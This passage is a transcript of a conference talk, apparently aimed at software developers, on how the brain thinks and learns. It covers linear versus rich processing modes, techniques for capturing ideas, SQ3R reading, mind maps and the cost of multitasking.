soil. You've got the overall life cycle of the tree. As it grows, it dies. The stuff rots, becomes part of the soil. It goes back around again. There's all these different cycles and systems and processes, interreacting and interrelating, and that's what makes a tree. We hit this in software sort of all the time. You think of the project as just this thing, but it's not. You think of the team as just a thing, but it's not. It's like this. There are a bunch of systems that all interact with each other. One of the things I exhort people, I urge people to always bear in mind is that you always have to be aware of the context. A tree doesn't just stand by itself. Neither do you, your project, your code. It's all part of some system. The context matters a great deal, as we'll see in just a moment. The other thing that I find interesting about how the brain works is patterns. This was pair programming in the good old days, just if you were curious. 
Interesting thing about pair programming, we tend to refer to it as you've got the driver, the person sitting there typing, and the navigator, the person sitting back and free to observe differences in the system and see patterns in the code, differences in the project, and see these kind of higher level things. It's interesting that there's actually good cognitive research that says the person who's not typing can actually see those patterns emerging in the code. The person who is typing cannot see them, just by the way the brain works. We'll look at that in a little tiny bit. It's interesting to see that even on some simple XP practice such as pair programming, there's demonstrative cognitive help there. It's a good thing to do. You can get advantage from that. This idea of being able to see patterns and being able to recognize patterns is one of the hallmarks of expertise. This is something you see in expert doctors or firemen or airline pilots or what have you. This whole idea of pattern matching, pattern seeking is kind of interesting. The last thing I want to cover just to sort of background sort of things is this idea of neuroplasticity. This is kind of a funny story. For many years, many, many years, it was assumed and taught that you had a fixed number of neurons in the adult brain. Once you got to that number, that was it. You couldn't grow anymore. You weren't getting new ones. Sadly, they also said that beer and wine would kill neurons. This was a really bad combination. You're kind of just going for a net loss as life goes on. Turns out that's not true. You actually do grow new neurons in your adult life, quite a few if you need to. They've done studies on London taxi cab drivers and they've got a huge concentration of neurons that were grown specifically to memorize the routes that they have to take as taxi drivers. If you're a piano player, you've got a whole bunch of neurons that were dedicated to the purpose of memorizing scales and these sorts of things. What actually happens is there's a battle for cortical real estate in your brain. Whatever you do the most of, your brain will reconfigure itself to accommodate that. If need be, it will grow new neurons and dispose of some of those old drunk ones in the corner. It doesn't need anymore. A little garbage collection. Just get rid of those. The punchline, the funny part about the story is for decades, the researchers got this wrong. They thought that you did not grow new neurons. The reason that they thought that is actually even more interesting than the fact that you grow neurons. They would do their laboratory tests with primates in a sterile lab environment, sort of like a gray cubicle. If you want to think about that way. In that environment, sort of sensory deprivation, these primates are used to being out on vines in the jungle with color and scents and leaves and predators and all kinds of sensory stimulation. You stick them in a cage or cubicle without much sensory input and you don't grow new neurons. You might as well be sitting there watching the voice or something or Norway's got talent. You have whatever, something. You won't grow new neurons under those circumstances. This brings us back to the idea of context. They got the wrong results by studying the animal outside of its native context. They decontextualized it. You take it out of context, you get the wrong idea about it and they were wrong for decades about this. So, point one, context is utterly important for whatever we're going to talk about. 
Point two, what you think and how you think it can physically change your brain. Physically, it will grow new neurons, dispose of old ones, reroute pathways, get rid of old information, reorganize new stuff. It is a self-modifying machine which makes it kind of tricky to talk about. But we're going to try anyway. So, the stuff I'm going to talk about today, when talking about the brain, I'm going to use a very grotesquely oversimplified analogy. And invariably, somebody comes up afterwards and says, the brain doesn't really work that way. And it's like, no, of course it doesn't. This is a very simple picture. Your brain doesn't work like this. But it's a helpful way to kind of think about it and certainly to talk about it. So imagine, as a metaphor, imagine if you will, that your brain is kind of like a computer. And if it were a computer, it's not, if it were, you could picture it as a dual CPU shared bus design. So, what that means is you've got memory sitting up here. You've got a shared bus to these two CPUs. You've got this CPU on the left, which functions as kind of like a very traditional von Neumann processor. Step by step, this instruction, then the next, do this, do the next thing, do the other thing. That little voice in your head that you kind of chat to yourself with, that comes from over here. Hopefully you only have the one little voice. If you've got more than that, then you've got some kind of multi-processor design. I don't know what's going on with that. But this is very linear and very slow. This style of processing that your brain does over here, what we're calling CPU one, runs at about 110 bits per second, about the speed of speech. It's relatively slow. This other CPU over here is quite different. It's more like a magical digital signal processor. It's like this kind of magic, you know, graphics chip or DSP chip. It is blazingly fast. It is not linear. You cannot order it to do anything. It is asynchronous. You give it a job, it goes off in the background, putters around for a while, and sometime later, the results get delivered asynchronously. You notice that CPU one is conveniently on your left. And CPU two is on your right. And back in the 60s, they actually referred to this as left brain and right brain. Turns out, as with most things in the brain, it's not that simple. It doesn't actually even really work that way. But you'll see it oftentimes in the literature that talks about right brain thinking and left brain thinking, and that's kind of hooey. There's really no such thing in that sense. What you have actually are more this style of processing and this style of processing, and different areas in the brain will light up and activate depending on the task at hand. So if you think of these as sort of modes instead of physical hemispheres, we'll talk about it as L mode for linear mode and R mode for rich mode, and that's slightly more accurate than getting into the old fashioned left brain, right brain thing. So if we look at this, this CPU one, left mode of thinking, these are very familiar traits of this style of processing in your brain. This is where you get generation of language, analysis, symbolic representation, you know, very logical, very linear. This is what we're all very accustomed to in our day jobs, yes? This looks familiar, comfortable? But it's very slow. Then you got this other thing happening over here. And that is quite different. This rich mode is not verbal. 
It can't generate language. It is non-rational. Oh, I was stepping on some toes here. Non-rational is bordering on insulting, right? You get an argument with your significant other. You're not being rational, okay? Probably not. Interestingly enough, if you do go back to sort of geography of the brain, this R mode is like 80% of your brain's processing power. That linear mode, that L mode that we talk about is much smaller, 10 to 20% perhaps. This is the bulk of what's going on. And this is very different. This is where intuition comes from. This is much more holistic thinking, looking at things as a whole. Again, going back to that idea of looking at things as systems, non-verbal. This side, this processing style likes to learn by synthesis instead of analysis. So in L mode, you're used to analysis. You take something, you pick it apart, you look at the parts, you analyze it. This side, this mode wants to learn by synthesizing, by putting things together. This is what, well, let me build a prototype. Let me write a couple lines of code. Let me build something. Let me try something. That learning by synthesis is associated with this side of the world. So this is kind of interesting. This is also where your inner search engine comes from. So if I asked you some trivia question, some sports question or rock music or what have you, and you know you know it, but you can't think of the answer right off, this will sort of submit a batch job in the background and go look through memory until it finds it. Now, there's a problem with these two modes of processing. They fight with each other a bit. One blocks out the other and they fight over memory. They can't both access memory sort of at the same time. Have you ever had that experience where you've had a very vivid dream and you wake up and you can remember every detail crystal clear and what happens is you try to describe it to someone, right? It gets harder and harder to remember. It kind of evaporates. Well, that's this kind of like bus contention, for lack of a better word, between these two modes. One side generated the visual imagery of the dream and now you're trying to use the other mode to describe it by generating language and they're not really cooperating quite in the way that you want. So here's an interesting little illustration of these different processing modes at work. This is a gif of a rotating girl dancing, dancer. Raise your hand if you see it going clockwise. Raise your hand if you see it going counterclockwise. All right. So hands back for the clockwise folks. Think to yourself as you're looking at this, you know, do some math facts for me. What's the square root of 256? 16. What's 16 plus 4? 20. What's 20 divided by 2? Is the girl changing yet? What's 2 plus 6? Well, it's too simple for them. What's 16 squared? All right. Has it switched for anyone yet? Okay. Let's try the other people then. For the folks who see it going counterclockwise, picture yourself on a nice beach with azure blue skies and calm waters and the beautiful crystal and surf and the sand. Really picture that. Is she changing yet? They're just not going to admit it or no one's awake yet. In theory, okay, has this changed direction for anybody? Okay. Some people. The girl actually is not. You can look at the individual frames of the gif and you cannot tell which way the figure's moving. It's only like six frames to the gif and none of them give a particular spatial cue as to which way it's going. 
So whether you perceive it as rotating clockwise or counterclockwise, that's all in your perception. And your perception will vary depending what mode of processing is more dominant in your head at this particular time. If you concentrate on difficult math facts or something sort of linear, something l-modish like that, it will spin, make sure I get this right, counterclockwise. If your right mode is more dominant at the moment, the rich mode more dominant, it's going to spin the other way. It's going to spin clockwise. And sometimes you're not even consciously aware of a switch. You can be sitting here looking at this and suddenly it starts going the other way or back or forward. Now, some people, I can make it go. You can just chat with them and give them some math or give them some imagery and you can make it turn. It probably doesn't work first thing in the morning, but give it a shot. You can find this on the web. But it's just kind of interesting. There's another thing you can do with rotating your foot, whether it goes clockwise or counterclockwise. And it's driven off the same sort of principle. So there's some kind of weird stuff going on in your head there. What we'd like to do is try to capitalize on that. Try to capitalize on these kind of strange, pre-conscious processes that we're not really aware of and harness that to our advantage. I talked about dreaming for. You know the story of how the sewing machine got invented? This was kind of wild. This fellow, Elias Howe, in 1845, was it? Yeah. He was trying very hard to invent the first powered sewing machine. And he was having a lot of trouble trying to figure out how to get the needle to do what a needle has to do in a sewing machine. Go down, go back up, tie the loop. I don't know how to sew. Whatever it is it does. He was having trouble with this. And he's working in his lab trying to invent this, trying to get it to happen. It's not happening for him. So one night he has this terrifying nightmare. He's being chased through the jungle by headhunters, the kinds with spears, not like human resources. That would really be frightening. So he's got these headhunters chasing after him with the spears. And he wakes up in a cold sweat. He's trying to describe the dream as best he can while he can still remember it. And he remembers this strange detail. He said, you know, it was all like what you would see in, you know, National Geographic or whatever they had at the time. But the spears looked really weird. They looked like kind of normal spears, but they had a hole in the tip. Almost like you could pass a string through it. Ah. And he solves the problem of the sewing machine. A regular sewing needle, I'm told, has the hole at the back for the thread. A machine needle has it at the tip. And that was his big insight that led him to develop the sewing machine, which he got a patent for in the U.S. in 1845. So what happened here? Well, he'd been doing the experiments. He'd been working on this stuff. And somewhere in that gray gooey mass that was his brain, somewhere was the flash of insight, the idea, the notion that, hey, you need to put the hole at the other end. That's the secret. Or at least something to try. It's a good idea. But he wasn't aware of this consciously. This was just kind of brewing in the soup up here. So what happens is this R-mode processing has this idea, but how does it get it to you? The R-mode can't generate language, but it can generate visuals. So you get the nightmare. 
You get the dream with this kind of weird little feature in it that if you pay attention, it's like, aha, it's a clue, a clue my brain is trying to give me. So it turns out there's some stuff like this that you can kind of capitalize on and try and take advantage of it. This goes in order from the weirder and less supported to the more concrete that absolutely works. We'll start on the weirder side. There's a fellow who claims image streaming is a really good technique. And I've had people from talks tell me this works great for them. Your mileage may vary. But the way this works, you start off, you want to ask yourself a question or pose yourself a problem and close your eyes. This is great to do at work. Put your feet up on the desk, close your eyes for a little bit. And typically you'll see an image float across your field of vision, your imagination. So what you want to do, first of all, is describe it out loud. Actually using your voice. Don't just say the words in your head because that activates different neural pathways. You actually want to use your voice to describe it. So just to get the picture here, you've got your eyes closed at work with your feet on the desk and you're talking to yourself. Regardless of that, whatever the thing you saw, try to imagine it with all five senses, if possible, or at least as many senses as possible. Your brain, on this point, is kind of stupid. If you describe an image, even if it was fleeting, you saw some image, something and it's gone, if you start to describe it in present tense, it's as if your brain's like, oh, that's still here. It's still around. It kind of drags it back a bit. The same thing with imagining it in multiple senses by activating these different sensory pathways, you kind of build a deeper connection to it. You kind of hook on to it a little bit better and describe it in present tense even if the image is gone for the same reason. And if you start doing this for a while, you start to, you know, it's not quite lucid dreaming, but it's something along those lines where you start noticing things that maybe your brain's trying to tell you, that are percolating in your pre-conscious soup. Some percentage of the population, 10, 20%, could do this all day long and never see an image. Just not wired that way. You can stare at a bright light, rub your eyes, get the phosphene effect, go stare at the sun. No, didn't say that. Something like that. And it's sort of the same idea. The source of the image isn't particularly important. It's your brain's struggle to interpret it. That's where the fun comes in as your brain tries to figure out what is this weird scene that I'm seeing here. Another way of kind of tackling this problem is just free-form journaling or writing. And this is an interesting thing just in the number of strange places I've seen this idea pop up. I have seen this in executive retreats, in Master of Business Administration courses, master's courses. You see it in author retreats and author writing workshops. And the idea is you get up first thing in the morning before having coffee, before having a shower, before reading Twitter, before Reddit, before anything. And the very first thing you do is write out three pages of whatever longhand with an old-fashioned pen or pencil. Not typing. We'll see why in a bit. You write out a couple pages longhand and don't censor anything. Whatever stupid idea comes up, just jot it down and do it religiously and do it every day. 
So in one of the executive retreats, they pulled this technique out. And one of the CEOs is like, I paid money for this course. Are you kidding me? This is the stupidest thing I ever heard of. They're like, well, just do it anyway. He's like, okay, I got nothing to say. Like, fine, just write out for three pages. I have nothing to say. So he does. He writes that out. This goes on for a couple days. A week later, he comes back and says, you know what? I was wrong about that. He was starting to get really interesting content coming out. He was getting marketing plans, new ideas, fresh things just started kind of spilling out as it were. So it took him a week to do it. Some people have reported they get this right away. Again, your mileage may vary. There's a lot of other ways to kind of get around this problem. This is Thomas Edison who invented the light bulb in 1879. Prolific inventor came up with a lot of stuff, tried a lot of ways to get to electricity and the light bulb and various other inventions. And he had a peculiar habit, a peculiar technique for seizing on ideas that his pre-conscious was trying to deliver to him. He would take a nap in the middle of the day with a cup in his hand filled with ball bearings, little round spheres of metal, BBs in his hand. And the idea is he'd fall asleep and as he'd fall asleep he would drop the cup of BBs onto the floor and it would clatter and make this horrific noise. And I'm sure his housekeeper really appreciated this as well. So he'd be just drifting off, bang, bang, bang, bang, bang, all the BBs would land. He'd wake up and immediately go and jot down the first thing that was on his mind. Interesting. Worked for him. So there are other ways of approaching problem solving, ways we can sort of harvest things that might be brewing in your stew. The other thing to kind of look at is jiggling thoughts loose if they're stuck. And there's a great book called A Whack on the Side of the Head by one Roger von Oech. And at first I thought this was a book on how to do customer service. But no, this is a way of looking at problems differently. He has suggestions like looking at a problem and trying to look at it in reverse. So instead of trying to fix a bug by making it not happen, think of the ten ways you can deliberately make it happen. And that might shed some insight on the process. Exaggerate it. The bug just does this, well what if it did all of this? What can you learn from that? Combine ideas, rearrange them, ask why, all these sorts of things to kind of jiggle loose what you're thinking about. And he talks probably more importantly about these kind of mental blocks or locks that prevent you from seeing the solution. Things such as believing there's only one right answer, which is rarely true after sort of primary school arithmetic. It's very rare you get just one right answer. Thinking that something's not logical. Eighty percent of your brain's processing power is not logical. If you're married or have a significant other, did you go through a logical process to select them? Did you go through a checklist and an Excel spreadsheet? And if you did, I'd like to talk to you afterwards because that's kind of funky. No, of course not. We are not logical beings. We don't work that way. And so on and so on. So he's got these various mental locks to look at. And some of the examples were just sort of interesting when you look at other ways of looking at things. For instance, he gives this little test. 
This was from the book where he says, if I take away six letters from this figure, what common English word is left over? No fair any other words. What common English word is left over if I remove six letters? And I guarantee to you, you are looking at this, you're thinking about this the wrong way. He was being very literal. You remove six letters. And you see, we're not used to thinking that way. As soon as you say, ooh, it's a puzzle, you bring all this kind of baggage to the table thinking, oh, it's random, it's any six letters, it's blah, blah, blah, all this kind of stuff. And he's got other examples, this great sort of six-year-old joke, you know, what do John the Baptist and Winnie the Pooh have in common? A middle name. If you're six, it's funny. The point is, we're not used to thinking in this context, we're not used to thinking that concretely. You know, we're looking at, okay, what's the symbolism behind it, what's the this, what's the that? We're bringing all this other stuff to the table when, in fact, it's just a very concrete, very simple, stupid joke or concept. We're just kind of looking at it the wrong way. So this brings us to the magic of, in classical literature, the idea of an oracle, lower case O, not the big scary oracle, the lower case O. So what would happen is, you know, you would go to the magic oracle and it would give you some impenetrable statement and you'd have to go back and ponder it. And it's interesting how this works. I mentioned before the R mode in your brain is kind of responsible for pattern matching and searching your memory. So what happens is, when you're faced with something like one of those images that you see from rubbing your eyes or you're faced with some, you know, Chinese fortune cookie statement or something from an oracle that doesn't really make sense on the face of it, what your brain has to do is kind of take that and widen out its search parameters. It's like, okay, I don't know what in the hell you're talking about. So we're just going to start combing through everything, anything that might possibly be a match. So something like a Zen koan works this way, right? You say, what is the, you know, one hand claps, what sound does it make? Or commonly translated as what is the sound of one hand clapping? You feed that into your R-mode search engine and it's like, what? That's stupid. That makes no sense. What are you talking about? All right, well, we just broaden out the search parameter and start looking through everything. So it's kind of a way of broadening what your subconscious processes are examining and trying to come up with. And the mathematician Henri Poincaré, I'm sure I massacred that, my Norwegian's worse, he used to do this. He would be working on a math proof and get to a kind of certain point on it and get stuck and not know how to solve it. So he would sort of put it all down and he'd go for a walk, just a walk out into his garden somewhere around and halfway through the path, he'd be like, oh, I didn't try whatever. I didn't think of that. He'd run back, jot it down. Oh, yeah, that works. Look, you just get to the next step, stuck again. Out you go. Now the key when doing that, you don't go out there on the walk and go, God, I got to solve this guy. What is X? Why can't I find X that's right there? Why can't I do this? You know, bubba bubba. That's not the way to do it. The way he described it was, you want to hold the question lightly in your mind. 
So you don't start thinking about a television show or what kind of beer I want for dinner tonight or this sort of thing. But you just kind of hold it lightly back there. Yeah, think about that. But mostly you're concentrating on the walking. And what this does, it kind of gives that overzealous chatty L mode, which tends to block out the R mode processes. It gives it something to do. It's thinking about walking. Left, right. Is this platform going to fall if I get to the edge? You know, it kind of gives it something to do. And that frees up the R mode to kick stuff over the fence. So you've probably experienced this yourself. If you've been coding or working on a design problem or some kind of bug and you're just really stuck and you can't figure it out, you can't figure it out, you give up in desperation and you slam the computer, you storm out, you walk in down the hall, you're walking out to go home. And what happens when you're like halfway out somewhere? I didn't set X to zero or whatever it was. The idea pops into your head. Well, that's this kind of phenomenon. As it turns out, the worst place to be if you want to be inventive or creative, the worst place you can be is in front of the keyboard. Why is that? Well, what happens is you're sitting there typing and working on letters and curly braces and symbols and this sort of stuff. Your brain gets locked into favoring L mode style processes and it shuts out the R mode completely. It's just locked in this. This goes back to the pair programming example. The driver who's sitting there typing gets locked into this kind of symbolic manipulation mode and all these other processes don't get a chance to actually fire or work. Whereas the navigators sitting there, they're not typing, they're looking around, they are more free to let these other processes come into play. So as a consequence of this, first of all, when you are stuck on a problem, step away from the keyboard. That's the best thing you can do. Secondly, this presents us with a bit of a problem. Because these pre-conscious processes are sort of asynchronous and not under our direct control and because they're more likely to fire when we're not at the computer, what that means is that we're going to be somewhere else when the great idea comes to us. You're going to be mowing the lawn, doing the dishes on the hammock, in the pub, at the restaurant, on the bus, the train, the car, whatever. You're going to be somewhere else when this pops into your head. And we need to do something about that. So what happens is everyone has these kinds of great ideas, but they come to you at random times. So few people actually bother to keep track of good ideas when it comes to them. Even fewer then act on it, and then very few, given all that, actually have the means to sort of pull it off. So to get up this ladder, at first, at least, you've got to keep track of great ideas. Now, it turns out that the way your brain works, if you start keeping track of great ideas, your brain will acclimatize to that. It's a self-organizing machine, right? So if you start doing that, it's like, oh, you want this kind of stuff. I'll be on the lookout for that. I'll start finding more and more of that. Consequently, if you don't keep track of good ideas, then your brain's like, I'm giving up. I'm going to go into the back and watch old reruns of Lost or something. It's like, you know, eh, don't need to bother with it. 
So it ends up that to get great ideas, you've got to start keeping track of them, and then you'll get more of them. So what you need is what we lovingly call an exocortex. Some place to keep ideas outside of your brain, because your brain's pretty bad at keeping track of this sort of stuff. This is really the number one idea that can get you ahead with something. It's just simply writing down an idea when you have it, whenever you have it. So that means you have to have something that's with you all the time. I carry around a little Moleskine notebook, one of the small ones, and a Fisher space pen. This is the kind that will write upside down in a boiling toilet should the need arise. Not that I've tested that. That's the marketing claim. But you know, it's small and it's with you all the time. I know folks who carry index cards in their back pocket; you can use your iPhone or something, being aware of the dangers of sort of, you know, having to type to get a note in. One fun thing you can do, especially if you're driving or your hands aren't free, is use your cellular, your mobile, and leave yourself a voicemail with whatever your idea, your insight, your notion might be. And if you've got a system like some of them out there where it'll take and transcribe your voicemail into email, you call yourself, leave yourself a message, get to your office, get to your computer. Here's your great thought transcribed for you in your inbox. You can copy and paste it and stick it somewhere and then work with it later. So there's a lot of ways to kind of get around this. Some of them are a little fancier than others. This is kind of a cool idea. This has been around for years, a website called pocketmod.com where you can pick out the style to make like this little foldable booklet out of a single page of A4 or 8.5 by 11 paper. And you can tell it if you want lines or grids or tables or what have you. And with a couple cuts, it folds up and makes this great little booklet. You can stick it in your pocket. That and the stub of a pencil and you're good to go. Cheap as dirt, but it's with you all the time. It's disposable. For stuff online, if you stumble across stuff and you want to save it, something like Evernote.com is probably a good place to stick resources so you don't lose them. And that's what happens: we have this tendency to say, oh yeah, I'll remember that. You wake up in the middle of the night with a great idea. Oh, I'll remember that in the morning. Not going to happen. It does not happen. It doesn't work that way. You've got to jot it down. I'll find that website again. I never do. They're effervescent. Jam it in here. Do something with it to keep it. So that's one way of looking at thinking and learning, of trying to harvest stuff that our brains are trying to tell us. That's kind of working on the output side of it, if you will. So now I want to talk a little bit about the input side of the equation. What can we do to make learning a little bit more efficient, more effective? Hopefully none of this is anything shockingly new to you. Hopefully this is all stuff you've maybe stumbled across once before, but is just a good reminder. If it is shockingly new, write it down. So the first thing to be aware of is, as a learner, you're trying to learn a new library, framework, language. I hear Elixir is really cool. You're trying to learn something new. There's different ways of learning, different learning modalities.
Classically, they start off saying there was three types of learners, visual, auditory, or kinesthetic. This guy named Gardner came up with seven different intelligences, seven different ways. They ended up adding more even onto that later. It doesn't particularly matter. Obviously, if you like coming to lectures like this and you learn best from this kind of thing, you're probably more an auditory learner. You like hearing it. If you need to read it, you need to see it. That's more visual. If none of that works for you, you just want kind of experience with it. You want to play with it. You want to try it out. That leans more toward the idea of kinesthetic or experiential learning. They're all valid. Nobody is just one of these. You can learn by any of these methods, but for you in particular, one or more of these might be more efficient than the others. If you haven't figured that out yet, that's kind of worth a try. Let me go to a couple conferences, read a couple books, try some stuff out when it's brand new without reading about it or hearing about it and see what works best. Then you can focus on that thing. Okay, well, I know I need to hear it, so let me get the book on tape. Let me listen to the podcast, whatever, and concentrate on that as opposed to perhaps trying to read it. Having said that, sometimes that can just be a luxury because 90% of the stuff that we need to absorb is only going to come to us in written form. It's going to be an article, a book, something on the web, and you have to read it anyway. That's interesting. How do you read? Does it matter? Do you just like start scanning it with your eyeballs and it just fills in or are there better ways to approach reading perhaps? Turns out there are. There's a variety of kind of reading summary techniques for lack of a better word. They'd all sort of boil down to this same kind of workflow here. This popular one's called SQ3R because the steps in English at least comprise an S, a Q, and three R's. The idea is the first thing you do is survey the whole work. It doesn't matter whether it's a paper book or an e-book or an article on the web. You just kind of scan the whole thing. Look at the table of contents if it has it, chapter summaries, section summaries. Kind of get your head around the whole thing without delving in too deeply yet just to kind of get a sense of the scope, where it's going, what you want out of it. Then note any questions you have. Is this going to teach me about exception handling? Will I actually understand what a monad is after this? Will I understand how to curry something? Whatever it is. Note the questions down. Don't do anything else with them yet. Just kind of write it down. Then go through and read the piece in its entirety front to back. When you're done with that, then try to start to recall. Try to remember stuff. Try to do it. This gets really kind of interesting. You can read, for instance, a book on a programming language and say, oh, yeah, yeah, yeah, I get it. You do this, you do that. It uses brackets for this and curly braces for that. I understand it. Okay. Now go try and type hello world or something from scratch. Oh, yeah. Now wait. How did that go again? Trying to recall and actually use it turns out to be more powerful than rereading it and reading it again. In the old days, they used to say that cramming for a test should all be about rereading the material. Turns out it doesn't work that way. It's much more efficient to test your recall of the material. 
That's what strengthens all the neural connections is trying to retrieve the information. So something you really want to memorize, you want to emphasize the recall of it. And of course if you don't know it, go back. Okay, it's that. Now I'll need to test myself on that again later at some point. But concentrating on the recall is what really cements it into your memory. And then you expand on that. You review what you read. Look at your notes. Look at the questions you had noted down. Did it answer that? Yes, no, maybe. Oh, it talked about that. But now I don't remember. Let me go back and look at that and so on. And what this does is this gets you this kind of flow from one set of processes to another. And that's really the secret. Back in the 1960s and the 70s when they first discovered this kind of right brain, left brain dichotomy, at the time, you know, there was tons of books about, you know, right brain cooking and right brain tennis and right brain this and yada yada. And it's stupid. Your brain doesn't actually work that way. What you need is to have both sets of processes cooperating. And in this case, this is actually a good example of doing something that starts off in a very broad, holistic fashion, surveying the whole work, thinking of general questions over the whole thing, and then narrowing down to very traditional linear L-mode sorts of, you know, make yourself a test and recall it and so on and so forth. And this kind of combination of activities seems to be much more effective than any one set on their own. So that's the kind of thing we try to head for. So in a similar vein, how do you take notes? You're studying a new language, a new technology, new framework. How do you take notes as you go along? Do you take notes as you go along? I find this kind of interesting. I mean, in the old days, if you were like, you know, studying for university or something or a test, of course you would take notes in the class and do that sort of thing. But now you want to learn a new programming language. You want to learn Ruby. You want to learn JavaScript the right way. The good parts of JavaScript, that won't take long. You know, Elixir, Erlang, whatever. Do you take notes as you go? Or do you just kind of read some stuff and mess around with it and try a few tutorials and oh, now what was that again? No, you want to take notes about it. And if you're trying to invent something, all right, you try to come up with a new design, you know, some solution for the project you're working on, some exploratory thinking. Great way to take notes. Best way to do that kind of note taking, where you're learning something or where you're exploring a topic, is with a mind map. And this is funny. Let me just confirm a bias here. How many people in the audience right now are from the U.S.? Raise your hand. Good. Okay. One relative, that's fine. So everyone else is from Europe. Okay. Raise your hand if you were exposed to mind maps anywhere in your educational process. Grade school, primary school. Okay, a little less than usual; it's usually like 100%. And it's funny because if I ask that question in the U.S. and say, you know, have you ever heard of a mind map before? Crickets. Nobody raises their hand. They've never even heard of such a thing. And it's usually closer to 100% almost anywhere in Europe. It's like, oh, yeah, we've had that. You know, we use that in school, so on and so forth. So I'll assume this is at least a little familiar to you. I just want to go over a couple things.
Does this look particularly tidy or neat? No. This is a working document. This is something you scribble on when that asynchronous insight comes to you. Oh, look, this is related to that. Boom. You put a big swoop on it. It's very much a working document. This was part of the thinking and learning book that I wrote. And, you know, you eat lunch. You leave this out on your desk. You eat lunch over it. I think that was mayonnaise. That was red wine. Not sure what that one was. You know, it's messy. It's organic. And that's the kind of tool you want for this kind of exploratory thinking. So you start with a mind map. You jot some stuff down. And then you want to look at it and kind of work the mind map. You want to ask yourself, okay, I've gotten this so far. What else do I see? Are these things related at all? Is there something missing here? I've got this in and that in. Is there anything in here I should know about? What else do you know that you could possibly add to this? Well, I read this other thing the other day, but I don't see how it fits in. Okay. Draw it over here to the side. You'll work it out later. What else, you know, could there be? It's like, wouldn't it be really awesome if you could do this to that? And if this thing were related to that and you could tie this in, you know, what else do you imagine could be? And predominantly, you have all these kind of thoughts floating out here. You're scribbling down. How are they related? Because just like in an object-oriented system, the objects aren't interesting. It's the relationship between them, the behaviors between them. That's what's interesting. And it's the same here. How do these things that I'm studying relate to each other? How do they tie in? That's where you start to get some real learning. So this is very messy, very organic, very loose. You can, of course, get mind map software for your computer. Is it as useful? No. Not particularly. You're getting back into that sort of L-mode symbolic lock. This is a great way to keep track of research, perhaps. I did this for the book. It's like, you know, you can click on things. It'll take you to the original PDF file from some doctor somewhere or some web page, but it's not a tool for exploratory thinking. But once you've finished that kind of exploratory phase and you need to kind of, you know, maybe productize that information and work on it a little bit more, you want to look at a different style of wiki. You want something now closer to the computer, something like, you know, a wiki like a Wikipedia uses or even better than that, just something like an editor in a wiki mode. You can do this with TextMate, with Sublime, VI, Emacs. You can probably do it in Eclipse for all I know. It's just an editor mode that will highlight camel case words and let you make new nodes very quickly. So as we said before, if you keep track of good ideas, you'll get more of them. And similarly, once you make a category for some kind of a new idea, your brain's going to start looking for that specifically. It's like you put a filter in place. And this is similar to an idea called sense tuning. But once you start looking for something in particular, once you've got a place for it, your brain's like, oh, look, I see this over here. I see this over there. I see that here. And it gives you a place to put it. Along the same vein, if you're trying to do this, expand this into more of a team environment, you can do something like this technique called affinity grouping. 
And the way this works is you get your team, you get your bunch of folks together, you get them little Post-it sticky notes and markers, and they all jot down ideas, thoughts, whatever the topic at hand is, and you stick them up on a whiteboard. Stick everyone's thoughts up there, and then you go through as a group and you try and you rearrange them. You coalesce them. Okay, these ideas are all talking about this. These talk about that. And as it starts to coalesce, you can draw circles around them and arrows and start connecting them. And basically, you've done a group mind map. So it's an interesting way to kind of get multiple people involved on it. The overall thought here is that for these kinds of very loose, slippery thoughts, you need very loose tools. You don't want the tool to interfere with the thinking process. So if you try to do something like this and then stick it into an outline in Word or something, it's going to kill you. Because as soon as you start typing and screwing around and then Clippy comes up and tells you something, your idea is out the window. And in fact, I had an interesting conversation just a couple of weeks ago with a fellow who makes hand-ground nibs for fountain pens, old-fashioned fountain pens. And he was describing how you make a music nib for composers. And it's got these special tines and you file it differently and all this kind of stuff. And he says that they sell these to all the big composers in Hollywood and such, and they refuse to use anything else when they're composing, especially at the piano. Because you want to be able to grab something and very quickly jot it down. And if you have to go type it into a music program like Finale or Sibelius or something like that, that extra effort of trying to feed it to the computer wrecks the thought. You start to lose it again, just like that dream you wake up from and you're trying to describe it. It's such an effervescent thought, you just want to get it down quickly before you lose it. So they use these special fountain pens that make a quick blob and a little strike and all this kind of deal. That's sort of interesting. So now some warnings and some advice on how the brain works. One thing we are not built to do, but we think we are, is multitask. We suck at multitasking. We are not good at it. If you think of the brain as a CPU, there is no sort of save stack, restore stack operation. If you're working on something and you get interrupted, you've got to pull all that information back one by one and build up where you were again. That's very expensive. And people think that you really can multitask and sometimes we'll take that to ludicrous extremes. You know, I can watch TV and I can text and I can write code and I can read a book all at the same time, or worse. It doesn't really work that way. So a study, and I'll put that in air quotes, in the UK a couple years ago suggested that if you constantly check your email while you're working on something, then your IQ will drop about 10 points. But at the same time, if you were to smoke a joint, a marijuana cigarette, your IQ would only drop about four points. Whatever you do, don't do both. That would be bad. Another study suggested that some 20 to 40% of your work day can get lost just by multitasking. That right out of the gate takes your eight hour day, if you remember what those were, down to a five hour day, lost just from context switching trying to multitask. So what do we do about this?
Rule number one, send less email and you will receive less email. Make the phone call, walk down the hallway, look it up on the web. Every email you send is just going to come bouncing back at you and maybe more so. Send less, you get less. Choose your own tempo for an email conversation. If somebody emails you and you bounce right back on it and get right back to them, guess what? You've set the tempo for that conversation now. Every time that person emails you, they're going to expect an instant response. I like to let emails age, like cheese or wine. It's like, oh, this was from Tuesday. That was a great vintage. We'll just let that age a little bit and send it back when I'm damn good and ready to. Either way, and sometimes you can't. If the server is on fire, you've got to deal with it. But it's your choice. You can choose when to reply and you can set the tempo and the pace for that conversation. If it needs to be fast paced, great. If it doesn't, don't do it. Don't context switch. That's the danger of multitasking. You're working on one thing and, oh, I've got to switch context and work on something else. Bang, you're dead. That's what you have to avoid. Getting things done, the David Allen cult slash method, the way you do it, he's got these set rules. Any kind of input queue that you have to work, call it email, but it could be a paper job list or whatever else it is. You scan the queue once and only once. From that, you do one of three things. You either answer it immediately ("No."), you assign it to somebody else ("Fred, take care of this"), or you sort it into a pile. All right, these are bugs I have to fix. These are things I have to pick up on the way home. These are meetings I have to set up, whatever it is. You sort it into piles. Then you go through and work each pile top to bottom. These are the bugs I'm working on now. I'm not rechecking the queue. I'm not checking email again. I'm working the queue in order. The other thing is not to ever keep mental lists. If you keep mental to-do lists, that's kind of like, your memory in that case is sort of like dynamic RAM. It has to keep being refreshed. So you kind of have to keep all these CPU cycles burning to keep this list going in your head. I don't have that kind of bandwidth anymore. Write it down. Get it out. Put it in your exocortex. Write it on a sticky note, something. Get it out of your head so you don't have that dynamic refresh going on. Set cues for task resumption. This is very clever. You're sitting there. You're in the flow. You're typing away and your boss, somebody comes in to interrupt you. 